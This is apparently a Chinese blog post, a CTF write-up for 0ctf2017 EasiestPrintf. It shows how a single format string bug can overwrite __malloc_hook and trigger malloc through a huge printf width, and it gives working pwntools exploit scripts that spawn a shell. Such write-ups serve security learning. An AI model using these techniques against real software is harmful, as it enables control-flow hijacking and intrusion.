利用printf调用malloc getshell&&0ctf2017_easiestprintf

已于 2022-04-04 17:12:37 修改
阅读量1k 收藏 1
点赞数 2
分类专栏: linux_pwn 文章标签: c语言
于 2022-04-03 17:59:57 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/azraelxuemo/article/details/123933079
版权

文章目录

首先题目名字严重…漏洞看上去很简单,但真的好难

0ctf2017_easiestprintf

0ctf2017_easiestprintf

题目分析

最难的题目往往代码很简单

保护

RELRO 全开,也就是不能修改fini,init,got表来劫持控制流,那么应该怎么做呢,同时也开了NX和canary
在这里插入图片描述

源码

在这里插入图片描述

do_read

在这里插入图片描述
可以泄露一个值,我们可以用got泄露libc

leave

格式化字符串漏洞,但只有一次
在这里插入图片描述

攻击

泄露libc

sla(b"read:\n", str(elf.got["puts"]).encode())
libc_base = int(rld(), 16) - libc.sym["puts"]

这个就是基本操作了

如何劫持控制流

一般来说我们可以修改exit got表为main函数再来一遍或者直接指向one_gaget,但这里got不可以修改,fini也不能改,当时真的蒙了
后来经过提醒才发现,printf会调用malloc,而__malloc_hook和__free_hook都是可以修改的

printf源码分析

#include<stdio.h>
int main(){
    printf("%1c");
}

主要原理就是当printf输出的字符过多的时候,会调用malloc来处理
我们大概放一下源码

if (width >= WORK_BUFFER_SIZE - 32)
   1500         {
   1501           /* We have to use a special buffer.  The "32" is just a safe
   1502              bet for all the output which is not counted in the width.  */
   1503           size_t needed = ((size_t) width + 32) * sizeof (CHAR_T);
 ► 1504           if (__libc_use_alloca (needed))
   1505             workend = (CHAR_T *) alloca (needed) + width + 32;
   1506           else
   1507             {
   1508               workstart = (CHAR_T *) malloc (needed);

这里的width是什么大概也能猜出来就是我们输出的长度,我们来调试一下
在这里插入图片描述
第一次的widht是1,很明显因为%c的功能,我们来看看第一个check是多少
在这里插入图片描述
也就是wdith首先要大于1000-32
在这里插入图片描述
然后回转化为needed,其实就是+32
在这里插入图片描述
然后我们想进入else,也要过第一个check
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
所以第一次失败,我们改成65537
在这里插入图片描述
额这里忘记会加上32,不过当然也过了check
在这里插入图片描述
我们看到这个时候malloc传入的就是我们printf输出的长度+32的结果
在这里插入图片描述

workstart保存的堆地址
在这里插入图片描述
这里会free workstart
在这里插入图片描述
但可以看到workstart里面并没有内容,最开始我还想通过把free-hook写成system,然后里面字符串写上/bin/sh,但发现好像再free的时候里面是没有内容的,额应该只是一个缓冲区,并不能保存
然后我考虑用one_gaget,但好像题目libc-2.23的我用不了,都挂了…

大概的逻辑我们差不多就知道了,现在我们来结合题目具体调试一下吧
由于之前调试没有32位的环境,刚才把32位的装好,大概思路差不多,但也有一点细微的差别
触发的具体位置不太一样了,但有一点细节要注意
printf他是一个个处理格式化字符串的
我们可以这样理解,他从前往后扫描,然后会比较每一次需要输出的内容长度,如果单次的长度够长的话就可以进入malloc
在这里插入图片描述

这里第一次实验我把触发malloc放在了后面,进去的时候__free_hook已经被修改了
在这里插入图片描述

第二次实验
在这里插入图片描述

在这里插入图片描述

小结

printf有以下特性

  • 他是从前往后扫描格式化字符串,依次执行
  • 每执行一个格式化字符串,都会去比较输出的大小,单次大小>65536-32,就会进入malloc
  • 上面特性区别于%c%n,%n会计算前面所有的输出长度

开始利用

这里由于free的时候堆里面没有内容,所以mem其实里面内容不能控,唯一能够的只有malloc的bytes,如果bytes也就是大小刚好是/bin/sh的地址,可以通过__malloc_hook getshell
但是在使用上述攻击之前,可以先尝试使用one_gadget

__free_hook替换成gadget

sla(b"read:\n", str(elf.got["puts"]).encode())
libc_base = int(rld(), 16) - libc.sym["puts"]
free_hook_addr = libc_base + libc.sym["__free_hook"]
one_gadget_addr = one_gadget[1] + libc_base
payload = fmtstr_payload(7, {free_hook_addr: one_gadget_addr}) + b"%65535c"
debug()
sla(b"Good Bye\n", payload)
it()

在这里插入图片描述
由于按照先后顺序执行,可以看到我们的free-hook被修改了
堆内容确实不可控
在这里插入图片描述
结果发现打不通,再试试__malloc_hook

__malloc_hook换成one_gagdet

居然打通了

sla(b"read:\n", str(elf.got["puts"]).encode())
libc_base = int(rld(), 16) - libc.sym["puts"]
malloc_hook_addr = libc_base + libc.sym["__malloc_hook"]
one_gadget_addr = 0x3A819 + libc_base
payload = (
    fmtstr_payload(7, {malloc_hook_addr: one_gadget_addr}) + f"%{65536-31}c".encode()
)
# debug()
sla(b"Good Bye\n", payload)
it()

在这里插入图片描述

最后一种解法

由于malloc_hook的参数可控,那么我们先做现在几个事情
1.malloc_hook改成system_addr
2.找data地方写个/bin/sh\0
这里由于data太短了,就写个sh

sla(b"read:\n", str(elf.got["puts"]).encode())
libc_base = int(rld(), 16) - libc.sym["puts"]
malloc_hook_addr = libc_base + libc.sym["__malloc_hook"]
sh_addr = 0x0804A001
system_addr = libc_base + libc.sym["system"]
payload = (
    fmtstr_payload(7, {malloc_hook_addr: system_addr, sh_addr: b"sh\0"})
    + f"%{0x0804A001-32}c".encode()
)
sla(b"Good Bye\n", payload)
it()

注意几个问题
sh_addr里面不要有\x00,不然printf到那个地方就不执行了,因为我们最后触发malloc一定要在所有值都被修改之后才可以执行,而我们fmtstr_payload的原理就是会在栈上放置对应的地址,一般是以bytes来写也就是hhn,所以会放addr+1,add+2,addr+3,add+4,这里我专门偏移防止\x00截断
但我们在payload里面要写\x0其实不影响的
然后最后bytes记得-32,因为printf调用malloc之前是这样计算的
实际需要输出的size+32
所以要-32
在这里插入图片描述

libc-2.27

在libc-2.27修复了一些东西
在这里插入图片描述
这里的read_int其实就是从我们输入的长度里面读一个int出来
在这里插入图片描述
在这里插入图片描述
如果大于214748364就会变成-1,相当失去了效果
所以这里就不太能够把malloc里面的bytes控成一个比较大的bytes,所以遇到这种情况还是打one_gagegt

azraelxuemo
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
!!malloc参考代码与注释.zip_ malloc_malloc
09-23
lunix下用c编写malloc函数
动态申请内存空间:C语言中的malloc函数
weixin_47712251的博客
06-04 1314
动态申请内存空间可以为我们在实际编程中带来很大的灵活性,使我们能够动态地存储变量的数据。通过使用malloccallocrealloc和free等函数,我们可以在堆区动态地申请和释放内存空间,使得内存的使用更加高效和灵活。
2022CSAPP大作业
zxpHIT2020的博客
05-15 251
2022csapp大作业 计算机系统 大作业 题 目程序人生-Hello’s P2P 专 业 计算机 学   号 120L021308 班 级2003011 学 生 周烜平 指 导 教 师郑贵滨 ...
20 printf 的调试
970655147的专栏
04-29 711
在最开始的 cmd 编程中, 我们会使用到的最常见的输出, 包括一些时候调试的时候 我们最常使用到的函数 那肯定是 printf 了我们这里来调试一下 这个 printf还有一个原因是 之前在调试 malloc 的时候,可以发现, 不仅仅是在 malloc 的时候调用malloc, 在 printf 的时候也调用malloc然后 我们这里来看一下 具体的情况, 以及一些 抽象的理解映射到 代码上面怎么处理的也可以参考一下。
今天的Linux实验
qq_52809135的博客
11-28 106
【代码】今天的Linux实验。
CSAPP程序人生
qq_64652551的博客
05-20 927
计算机系统 大作业 题 目 程序人生-Hello’s P2P 专 业 计算学部 学   号 7203610225 班   级 20xxxxxxx 学 生 wlh     指 导 教 师 刘宏伟    计算机科学与技术学院 2021年5月...
malloc方式 做printf的部分修改
huaply123的博客
07-21 216
printf打印的内容有时需要重定向,如果用malloc来动态分配所需的buff,就需要知道消息实际的字节大小,最后在man 3 printf 里找到了答案
关于printf函数泄露地址的libc题型
IT_huanhuan的博客
05-25 442
我们在构建ROP链时,应该想我们需要怎样去泄露地址,才能达到我们所希望的程序执行,因为是64位的,我们需要一些 pop|ret 去放我们的参数,printf在执行打印格式化字符串时,有产生一个参数,然后我们还需要一个寄存器,来存放我们got表里所要的真实地址。最后加个main函数,是我们返回到main函数,让程序走一遍,以便我们可以写入接下来的payload去控制程序流。因为这道题,我们首先应该做的是泄露地址,泄露那个地址,我觉得可以是printf或者是read的地址都行,接下来我们就尝试一下吧。
动态顺序字符串基本操作实验_Blind_pwn之格式化字符串
weixin_39993989的博客
11-07 92
作者:SkYe合天智汇可能需要提前了解的知识格式化字符串原理&利用got & plt 调用关系程序的一般启动过程原理格式化字符串盲打指的是只给出可交互的 ip 地址与端口,不给出对应的 binary 文件来让我们无法通过 IDA 分析,其实这个和 BROP 差不多,不过 BROP 利用的是栈溢出,而这里我们利用的是无限格式化字符串漏洞,把在内存中的程序给dump下来。一般来说,我们...
0CTF-EasiestPrintf真的很easy
BadRer的博客
06-17 2482
这次给大家带来的是0CTF中的一题EasiestPrintf。废话不多说,直接上题。 可以看到开了很多保护。其中full relro说明got表不可修改。(我也是看别人写的,没有实践过,大家可以试着去改下got表) 前面的老套路就不说了。 IDA查看反汇编。 漏洞就在这两个函数里,而且都是格式化字符串漏洞。 但是有一点我们可以观察到,在第二个printf之后直接调用
sprintf 也会调用malloc_r 函数接口
~ 飞 扬 的 天 空 ~
09-28 2421
int main () { char buf[200]; float fl_val= (float) 0.000001; // err // float fl_val= (float) 0.0000001; // ok sprintf(buf, "%f", fl_val); }
mem.rar_Free!_malloc_malloc和free_mem_free_mem_malloc
09-20
实现自己的mem_malloc和mem_free
pb_buffer_malloc.rar_The Store_malloc
09-14
Implementation of malloc-based buffers to store data that can t be processed by the hardware.
malloclab_malloclab_malloclab_c_
10-02
ics课程第九章实现动态内存分配,最后得了86分,实在不想改了
11_new&delete与malloc&free 之间的关系与区别1
08-03
11_new&delete与malloc&free 之间的关系与区别1
sprintf在裸机下的堆使用情况(STM32+ <arm-none-eabi-gcc>)
snikeguo的专栏
10-07 331
实测sprintf函数在打印整数时不会调用MALLOC,在打印浮点是会调用malloc 如图所示为打印浮点时的函数调用栈回溯, printf也一样。 libc库采用:
缓冲区溢出漏洞浅析(二)
manok的专栏
10-08 713
10月1日整理了缓冲区溢出的C语言例子,今天再整理一下由于程序员编程错误导致的问题。可以理解为常规缓冲区溢出。常规缓冲区溢出是指由于程序员书写错误导致的显式缓冲区溢出漏洞。根据其产生方式,程序行为和调用函数的区别,分成为面几类。 给数组赋值字符串越界 缓冲区赋值超过缓冲区长度的字符串常量则会导致缓冲区溢出。 #include <stdio.h&gt...
计算机系统大作业——程序人生
wdsjlinlin的博客
05-19 398
本论文简单叙述了hello.c程序从出生到成长,再到结束的过程。便于读者更好的理解《深入理解计算机系统》这本书。
#include<stdio.h> #include<malloc.h> typedef struct _student_info_ { char s_id[16]; //学号 char s_name[32]; //姓名 int s_score[3]; //三科成绩 }student_info; void input(student_info *L) { scanf("%s %s %d %d %d", L->s_id, L->s_name, &(L->s_score[0]), &(L->s_score[1]), &(L->s_score[2])); } void print(student_info *L) { printf("%s,%s,%d,%d,%d\n", L->s_id, L->s_name, L->s_score[0], L->s_score[1], L->s_score[2]); } int main() { student_info *list; int n = 0, i = 0; scanf("%d", &n); while(getchar() != '\n') continue; if(n > 0 && n < 100) list = (student_info *)malloc(sizeof(student_info)*n); else return 0; for(i = 0; i < n; i++) { input(&list[i]); //一行一行获取,忽略一行多余的数据 while(getchar() != '\n') continue; } for(i = 0; i < n; i++) { print(&list[i]); } free(list); return 0; }给以上代码添加注释
最新发布
07-15
```c #include <stdio.h> #include <malloc.h> typedef struct _student_info_ { char s_id[16]; // 学号 char s_name[32]; // 姓名 int s_score[3]; // 三科成绩 } student_info; void input(student_info *L) { scanf("%s %s %d %d %d", L->s_id, L->s_name, &(L->s_score[0]), &(L->s_score[1]), &(L->s_score[2])); } void print(student_info *L) { printf("%s,%s,%d,%d,%d\n", L->s_id, L->s_name, L->s_score[0], L->s_score[1], L->s_score[2]); } int main() { student_info *list; int n = 0, i = 0; scanf("%d", &n); while (getchar() != '\n') continue; if (n > 0 && n < 100) list = (student_info *)malloc(sizeof(student_info) * n); // 动态分配内存空间 else return 0; for (i = 0; i < n; i++) { input(&list[i]); // 一行一行获取,忽略一行多余的数据 while (getchar() != '\n') continue; } for (i = 0; i < n; i++) { print(&list[i]); } free(list); // 释放内存空间 return 0; } ``` 这是一个简单的学生成绩管理程序。程序通过动态分配内存,存储学生的学号、姓名和三科成绩,并可以输入和输出学生信息。请注意,此代码没有进行错误处理和输入验证。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值